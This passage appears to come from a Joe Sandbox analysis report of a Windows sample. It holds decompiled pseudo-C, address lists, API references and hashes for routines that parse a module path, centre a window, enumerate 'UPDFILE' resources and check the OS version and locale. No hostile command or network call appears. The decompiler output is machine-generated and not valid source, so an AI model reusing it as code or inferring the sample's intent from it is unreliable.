                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C1680(_t65, E000C17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E000C65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E000C1680(_t65, E000C17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x000c2aac
                                                                                                                                                                                                        0x000c2ab7
                                                                                                                                                                                                        0x000c2abc
                                                                                                                                                                                                        0x000c2abe
                                                                                                                                                                                                        0x000c2ac3
                                                                                                                                                                                                        0x000c2ac6
                                                                                                                                                                                                        0x000c2ac9
                                                                                                                                                                                                        0x000c2ace
                                                                                                                                                                                                        0x000c2ae6
                                                                                                                                                                                                        0x000c2bdc
                                                                                                                                                                                                        0x000c2bdc
                                                                                                                                                                                                        0x000c2be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2af2
                                                                                                                                                                                                        0x000c2afc
                                                                                                                                                                                                        0x000c2b00
                                                                                                                                                                                                        0x000c2b05
                                                                                                                                                                                                        0x000c2b05
                                                                                                                                                                                                        0x000c2b0b
                                                                                                                                                                                                        0x000c2bca
                                                                                                                                                                                                        0x000c2bd1
                                                                                                                                                                                                        0x000c2b11
                                                                                                                                                                                                        0x000c2b18
                                                                                                                                                                                                        0x000c2b26
                                                                                                                                                                                                        0x000c2b99
                                                                                                                                                                                                        0x000c2bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2b9b
                                                                                                                                                                                                        0x000c2bae
                                                                                                                                                                                                        0x000c2bb3
                                                                                                                                                                                                        0x000c2bb5
                                                                                                                                                                                                        0x000c2bb5
                                                                                                                                                                                                        0x000c2bb8
                                                                                                                                                                                                        0x000c2bb8
                                                                                                                                                                                                        0x000c2bba
                                                                                                                                                                                                        0x000c2bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2bb8
                                                                                                                                                                                                        0x000c2b28
                                                                                                                                                                                                        0x000c2b2e
                                                                                                                                                                                                        0x000c2b33
                                                                                                                                                                                                        0x000c2b39
                                                                                                                                                                                                        0x000c2b3c
                                                                                                                                                                                                        0x000c2b3c
                                                                                                                                                                                                        0x000c2b3e
                                                                                                                                                                                                        0x000c2b3f
                                                                                                                                                                                                        0x000c2b55
                                                                                                                                                                                                        0x000c2b5d
                                                                                                                                                                                                        0x000c2b64
                                                                                                                                                                                                        0x000c2b64
                                                                                                                                                                                                        0x000c2b7a
                                                                                                                                                                                                        0x000c2b7f
                                                                                                                                                                                                        0x000c2b81
                                                                                                                                                                                                        0x000c2b81
                                                                                                                                                                                                        0x000c2b84
                                                                                                                                                                                                        0x000c2b84
                                                                                                                                                                                                        0x000c2b86
                                                                                                                                                                                                        0x000c2b87
                                                                                                                                                                                                        0x000c2bbf
                                                                                                                                                                                                        0x000c2bc1
                                                                                                                                                                                                        0x000c2bc1
                                                                                                                                                                                                        0x000c2b26
                                                                                                                                                                                                        0x000c2bda
                                                                                                                                                                                                        0x000c2bda
                                                                                                                                                                                                        0x000c2be6
                                                                                                                                                                                                        0x000c2be6
                                                                                                                                                                                                        0x000c2bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 000C2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 000C2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 000C2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 000C2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 000C2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 000C2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 29a9f0c91c82610f7b2ec294d134cdf97f9acb87961390c9ff646c626e3e1a4b
                                                                                                                                                                                                        • Instruction ID: f66dbde6ea48b9d259d2aa1527de0c4cdcc0ff587b9aed882904724d3c3169ee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29a9f0c91c82610f7b2ec294d134cdf97f9acb87961390c9ff646c626e3e1a4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C44107346042455FEB559F348C54FFE7BA99F57304F18009EE8C283642DB398E46CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x000c43d0
                                                                                                                                                                                                        0x000c43d8
                                                                                                                                                                                                        0x000c43df
                                                                                                                                                                                                        0x000c43e6
                                                                                                                                                                                                        0x000c43ec
                                                                                                                                                                                                        0x000c43f1
                                                                                                                                                                                                        0x000c4400
                                                                                                                                                                                                        0x000c4403
                                                                                                                                                                                                        0x000c440b
                                                                                                                                                                                                        0x000c4420
                                                                                                                                                                                                        0x000c4429
                                                                                                                                                                                                        0x000c4437
                                                                                                                                                                                                        0x000c4444
                                                                                                                                                                                                        0x000c4447
                                                                                                                                                                                                        0x000c444d
                                                                                                                                                                                                        0x000c4454
                                                                                                                                                                                                        0x000c445b
                                                                                                                                                                                                        0x000c4460
                                                                                                                                                                                                        0x000c4461
                                                                                                                                                                                                        0x000c4467
                                                                                                                                                                                                        0x000c446f
                                                                                                                                                                                                        0x000c4473
                                                                                                                                                                                                        0x000c4473
                                                                                                                                                                                                        0x000c4463
                                                                                                                                                                                                        0x000c4463
                                                                                                                                                                                                        0x000c4463
                                                                                                                                                                                                        0x000c447a
                                                                                                                                                                                                        0x000c4481
                                                                                                                                                                                                        0x000c4484
                                                                                                                                                                                                        0x000c448a
                                                                                                                                                                                                        0x000c4492
                                                                                                                                                                                                        0x000c4496
                                                                                                                                                                                                        0x000c4496
                                                                                                                                                                                                        0x000c4486
                                                                                                                                                                                                        0x000c4486
                                                                                                                                                                                                        0x000c4486
                                                                                                                                                                                                        0x000c44b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000C43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 000C440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 000C4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 000C442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 000C443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 000C4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000C44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 02aefc7613aae5094556930becf8361ecc4bfabdd9e43697f5fff14f363c7832
                                                                                                                                                                                                        • Instruction ID: 8a1e2c2d545ddd874143114031d23cdc9880aab24321b5b6ee42843bf56a99c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02aefc7613aae5094556930becf8361ecc4bfabdd9e43697f5fff14f363c7832
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F311C72E00119AFDB14CFB8DD89EEEBBB5FB89314F254169F805B3250DA346D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E000C6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E000C171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E000C171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E000C6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x000c6298
                                                                                                                                                                                                        0x000c62a0
                                                                                                                                                                                                        0x000c62a7
                                                                                                                                                                                                        0x000c62ad
                                                                                                                                                                                                        0x000c62af
                                                                                                                                                                                                        0x000c62bb
                                                                                                                                                                                                        0x000c62c3
                                                                                                                                                                                                        0x000c62c4
                                                                                                                                                                                                        0x000c633b
                                                                                                                                                                                                        0x000c633b
                                                                                                                                                                                                        0x000c6345
                                                                                                                                                                                                        0x000c634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c62da
                                                                                                                                                                                                        0x000c62de
                                                                                                                                                                                                        0x000c635f
                                                                                                                                                                                                        0x000c6369
                                                                                                                                                                                                        0x000c62e0
                                                                                                                                                                                                        0x000c62e0
                                                                                                                                                                                                        0x000c62e0
                                                                                                                                                                                                        0x000c62e3
                                                                                                                                                                                                        0x000c62e5
                                                                                                                                                                                                        0x000c62e5
                                                                                                                                                                                                        0x000c62e8
                                                                                                                                                                                                        0x000c62e8
                                                                                                                                                                                                        0x000c62ea
                                                                                                                                                                                                        0x000c62eb
                                                                                                                                                                                                        0x000c62ef
                                                                                                                                                                                                        0x000c62f1
                                                                                                                                                                                                        0x000c62f3
                                                                                                                                                                                                        0x000c6302
                                                                                                                                                                                                        0x000c6308
                                                                                                                                                                                                        0x000c630d
                                                                                                                                                                                                        0x000c6314
                                                                                                                                                                                                        0x000c6314
                                                                                                                                                                                                        0x000c6316
                                                                                                                                                                                                        0x000c6319
                                                                                                                                                                                                        0x000c6355
                                                                                                                                                                                                        0x000c6357
                                                                                                                                                                                                        0x000c631b
                                                                                                                                                                                                        0x000c631b
                                                                                                                                                                                                        0x000c6331
                                                                                                                                                                                                        0x000c6334
                                                                                                                                                                                                        0x000c6339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6339
                                                                                                                                                                                                        0x000c6319
                                                                                                                                                                                                        0x000c636b
                                                                                                                                                                                                        0x000c637d
                                                                                                                                                                                                        0x000c637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 000C6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: c78976f031ab326bfb304189c6e63a79014e15872e3ac469b43874dc84000c1e
                                                                                                                                                                                                        • Instruction ID: 7d3837226d25321136364ec6bc1c24dbd547b27afd004a5e56ec865dc3a454ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c78976f031ab326bfb304189c6e63a79014e15872e3ac469b43874dc84000c1e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8121D875A00219AFDB209FA4DC49EFF7B78FB45714B14011DF902A3241DB3A9D068BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xc81d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xc81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xc81d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xc1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E000C66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xc81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x000c681f
                                                                                                                                                                                                        0x000c682a
                                                                                                                                                                                                        0x000c6831
                                                                                                                                                                                                        0x000c6836
                                                                                                                                                                                                        0x000c683c
                                                                                                                                                                                                        0x000c683e
                                                                                                                                                                                                        0x000c6848
                                                                                                                                                                                                        0x000c6851
                                                                                                                                                                                                        0x000c685d
                                                                                                                                                                                                        0x000c6864
                                                                                                                                                                                                        0x000c6876
                                                                                                                                                                                                        0x000c693a
                                                                                                                                                                                                        0x000c693a
                                                                                                                                                                                                        0x000c687c
                                                                                                                                                                                                        0x000c687e
                                                                                                                                                                                                        0x000c6885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c68d6
                                                                                                                                                                                                        0x000c68f4
                                                                                                                                                                                                        0x000c6900
                                                                                                                                                                                                        0x000c6902
                                                                                                                                                                                                        0x000c690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c690c
                                                                                                                                                                                                        0x000c690c
                                                                                                                                                                                                        0x000c691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c691e
                                                                                                                                                                                                        0x000c6924
                                                                                                                                                                                                        0x000c692b
                                                                                                                                                                                                        0x000c6932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c692b
                                                                                                                                                                                                        0x000c691c
                                                                                                                                                                                                        0x000c690a
                                                                                                                                                                                                        0x000c6885
                                                                                                                                                                                                        0x000c6876
                                                                                                                                                                                                        0x000c6951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000C686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 000C68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000C68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,?,0000000C), ref: 000C68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 000C6902
                                                                                                                                                                                                          • Part of subcall function 000C66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,000C691A), ref: 000C6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 000C68C2
                                                                                                                                                                                                        Memory Dump Source
